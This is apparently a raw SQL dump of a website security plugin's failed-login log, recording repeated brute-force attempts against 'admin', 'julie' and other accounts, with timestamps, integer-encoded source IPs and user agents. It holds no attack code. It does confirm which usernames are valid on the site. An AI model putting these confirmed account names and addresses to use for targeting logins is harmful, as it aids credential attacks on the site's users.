(101197, 1497535413.424471, 1, 'loginFailValidUsername', 'admin', 1, 831894783, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101196, 1497535410.103272, 1, 'loginFailValidUsername', 'admin', 1, 831894783, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101195, 1497534874.830537, 1, 'loginFailValidUsername', 'admin', 1, 1868300323, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101194, 1497532404.565430, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.63.26) Gecko/20175675 Firefox/45.63.26'),
(101193, 1497531120.800311, 1, 'loginFailValidUsername', 'admin', 1, 1332374912, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101192, 1497531119.828640, 1, 'loginFailValidUsername', 'admin', 1, 1332374912, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101191, 1497529533.658356, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101190, 1497528117.317926, 1, 'loginFailValidUsername', 'admin', 1, 2945164872, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101189, 1497528115.812450, 1, 'loginFailValidUsername', 'admin', 1, 2945164872, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101188, 1497526559.958227, 1, 'loginFailValidUsername', 'admin', 1, 1327015571, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101187, 1497526558.994106, 1, 'loginFailValidUsername', 'admin', 1, 1327015571, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101186, 1497526219.047527, 1, 'loginFailValidUsername', 'admin', 1, 1814215517, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101185, 1497524680.625465, 1, 'loginFailValidUsername', 'admin', 1, 2006661691, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101184, 1497524679.294688, 1, 'loginFailValidUsername', 'admin', 1, 2006661691, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101183, 1497523734.938112, 1, 'loginFailValidUsername', 'admin', 1, 3115241646, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101182, 1497523733.901718, 1, 'loginFailValidUsername', 'admin', 1, 3115241646, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101181, 1497522680.251815, 1, 'loginFailValidUsername', 'admin', 1, 3240197617, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101180, 1497522679.190284, 1, 'loginFailValidUsername', 'admin', 1, 3240197617, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101179, 1497522332.078774, 1, 'loginFailValidUsername', 'admin', 1, 1697806700, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101178, 1497522330.054070, 1, 'loginFailValidUsername', 'admin', 1, 1697806700, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101177, 1497522089.726965, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101176, 1497521959.629218, 1, 'loginFailValidUsername', 'admin', 1, 3680243857, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101175, 1497521957.971541, 1, 'loginFailValidUsername', 'admin', 1, 3680243857, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101174, 1497521669.483834, 1, 'loginFailValidUsername', 'admin', 1, 1300190727, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101173, 1497521668.420647, 1, 'loginFailValidUsername', 'admin', 1, 1300190727, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101172, 1497521516.495394, 1, 'loginFailValidUsername', 'admin', 1, 1856543098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101171, 1497521514.447935, 1, 'loginFailValidUsername', 'admin', 1, 1856543098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101170, 1497518967.725112, 1, 'loginFailValidUsername', 'admin', 1, 2536930801, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101169, 1497518966.679125, 1, 'loginFailValidUsername', 'admin', 1, 2536930801, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101168, 1497514639.518820, 1, 'loginFailValidUsername', 'admin', 1, 1741028094, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101167, 1497514638.222744, 1, 'loginFailValidUsername', 'admin', 1, 1741028094, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101166, 1497514579.668459, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101165, 1497507459.842124, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101164, 1497506948.706742, 1, 'loginFailValidUsername', 'admin', 1, 1741681534, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101163, 1497504008.934589, 1, 'loginFailValidUsername', 'admin', 1, 2006647068, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101162, 1497504007.253050, 1, 'loginFailValidUsername', 'admin', 1, 2006647068, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101161, 1497501917.778672, 1, 'loginFailValidUsername', 'admin', 1, 3231737508, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 2.0.50727)'),
(101160, 1497494764.876957, 1, 'loginFailValidUsername', 'admin', 1, 2996386590, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101159, 1497494763.430874, 1, 'loginFailValidUsername', 'admin', 1, 2996386590, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101158, 1497494558.237445, 1, 'loginFailValidUsername', 'admin', 1, 1547655939, 'Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0'),
(101157, 1497487199.945642, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101156, 1497483124.803113, 1, 'loginFailValidUsername', 'julie', 2, 1053979353, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(101155, 1497481887.466498, 1, 'loginFailValidUsername', 'admin', 1, 3386002506, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101154, 1497481561.618432, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101153, 1497479453.586224, 1, 'loginFailValidUsername', 'admin', 1, 1288492650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101152, 1497479452.346645, 1, 'loginFailValidUsername', 'admin', 1, 1288492650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101151, 1497478743.912567, 1, 'loginFailValidUsername', 'admin', 1, 528486593, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101150, 1497476116.441945, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101149, 1497471594.752699, 1, 'loginFailInvalidUsername', 'travail', 0, 842965026, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101148, 1497471394.631241, 1, 'loginFailValidUsername', 'admin', 1, 2966208612, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101147, 1497471392.420067, 1, 'loginFailValidUsername', 'admin', 1, 2966208612, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101146, 1497470672.492134, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101145, 1497470314.174073, 1, 'loginFailValidUsername', 'admin', 1, 2037512030, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101144, 1497470162.659932, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1731536960, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101143, 1497470160.537947, 1, 'loginFailInvalidUsername', 'outils', 0, 1731536960, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101142, 1497470158.375031, 1, 'loginFailInvalidUsername', 'venez', 0, 1731536960, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101141, 1497470156.365742, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1731536960, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101140, 1497470154.336617, 1, 'loginFailInvalidUsername', 'cross', 0, 1731536960, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101139, 1497470152.319962, 1, 'loginFailInvalidUsername', 'pour', 0, 1731536960, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101138, 1497470150.291738, 1, 'loginFailInvalidUsername', 'notre', 0, 1731536960, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101137, 1497470148.292160, 1, 'loginFailInvalidUsername', 'training', 0, 1731536960, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101136, 1497470146.280915, 1, 'loginFailInvalidUsername', 'vous', 0, 1731536960, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101135, 1497470144.307619, 1, 'loginFailValidUsername', 'pablo', 3, 1731536960, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101134, 1497469361.308171, 1, 'loginFailInvalidUsername', 'objectifs', 0, 3233382727, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101133, 1497469359.149793, 1, 'loginFailInvalidUsername', 'cross', 0, 3233382727, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101132, 1497469357.070733, 1, 'loginFailInvalidUsername', 'pour', 0, 3233382727, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101131, 1497464940.468067, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101130, 1497458615.475655, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101129, 1497450984.720164, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101128, 1497442606.340472, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101127, 1497434885.355222, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101126, 1497429210.262286, 1, 'loginFailValidUsername', 'admin', 1, 1547655939, 'Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0'),
(101125, 1497427072.568710, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101124, 1497420001.364108, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101123, 1497413059.873079, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101122, 1497405676.091621, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101121, 1497399088.174952, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101120, 1497393189.426726, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101119, 1497387446.371987, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101118, 1497381587.286554, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101117, 1497374965.726939, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101116, 1497367600.455064, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101115, 1497212721.053774, 1, 'loginFailValidUsername', 'admin', 1, 3308102131, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(101114, 1497197323.332271, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101112, 1497197320.573320, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101113, 1497197322.002283, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101111, 1497197318.993813, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101109, 1497197316.262023, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101110, 1497197317.606518, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101108, 1497197314.605545, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101106, 1497197311.761310, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101107, 1497197313.198311, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101105, 1497197309.680239, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101103, 1497197306.628688, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101104, 1497197307.824049, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101102, 1497197305.305846, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101100, 1497197301.941739, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101101, 1497197303.212014, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101099, 1497197300.491432, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101097, 1497197297.266896, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101098, 1497197299.211877, 1, 'loginFailValidUsername', 'julie', 2, 2032808987, 'XML-RPC.NET'),
(101096, 1497197296.088768, 1, 'loginFailValidUsername', 'admin', 1, 2032808987, 'XML-RPC.NET'),
(101095, 1497192285.372897, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101094, 1497192285.062055, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101093, 1497192284.747922, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101092, 1497192284.438423, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101091, 1497192284.129322, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101090, 1497192283.821281, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101089, 1497192283.512329, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101088, 1497192283.203325, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101087, 1497192282.891976, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101086, 1497192282.580279, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101085, 1497192282.270837, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101084, 1497192281.958501, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101083, 1497192281.649834, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101082, 1497192281.341472, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101081, 1497192281.033046, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101080, 1497192280.718638, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101079, 1497192280.402416, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101078, 1497192280.087264, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101077, 1497192279.736527, 1, 'loginFailValidUsername', 'admin', 1, 1840808480, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(101076, 1497145391.740025, 1, 'loginFailInvalidUsername', 'namur', 0, 1732504327, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101075, 1497145388.919264, 1, 'loginFailInvalidUsername', 'travail', 0, 1732504327, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101074, 1497145386.197418, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1732504327, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101073, 1497145383.530231, 1, 'loginFailInvalidUsername', 'outils', 0, 1732504327, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101072, 1497145380.765043, 1, 'loginFailInvalidUsername', 'venez', 0, 1732504327, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101071, 1497145378.068804, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1732504327, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101070, 1497145373.634734, 1, 'loginFailInvalidUsername', 'cross', 0, 1732504327, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101069, 1497145370.922863, 1, 'loginFailInvalidUsername', 'pour', 0, 1732504327, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101068, 1497145368.137469, 1, 'loginFailInvalidUsername', 'notre', 0, 1732504327, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101067, 1497055578.681988, 1, 'loginFailValidUsername', 'admin', 1, 1985724027, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(101066, 1497039434.826371, 1, 'loginFailValidUsername', 'julie', 2, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(101065, 1497033703.041331, 1, 'loginFailInvalidUsername', 'center', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101064, 1497033700.849183, 1, 'loginFailInvalidUsername', 'namur', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101063, 1497033698.298548, 1, 'loginFailInvalidUsername', 'travail', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101062, 1497033695.917547, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101061, 1497033693.522078, 1, 'loginFailInvalidUsername', 'outils', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101060, 1497033691.354818, 1, 'loginFailInvalidUsername', 'venez', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101059, 1497033689.189838, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101058, 1497033687.021186, 1, 'loginFailInvalidUsername', 'cross', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101057, 1497033684.867739, 1, 'loginFailInvalidUsername', 'pour', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101056, 1497033682.701817, 1, 'loginFailInvalidUsername', 'notre', 0, 1370067079, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101055, 1497016384.206237, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101054, 1497016383.901174, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101053, 1497016383.596472, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101052, 1497016383.291340, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101051, 1497016382.758177, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101050, 1497016382.451468, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101049, 1497016382.146403, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101048, 1497016381.841153, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101047, 1497016381.537410, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
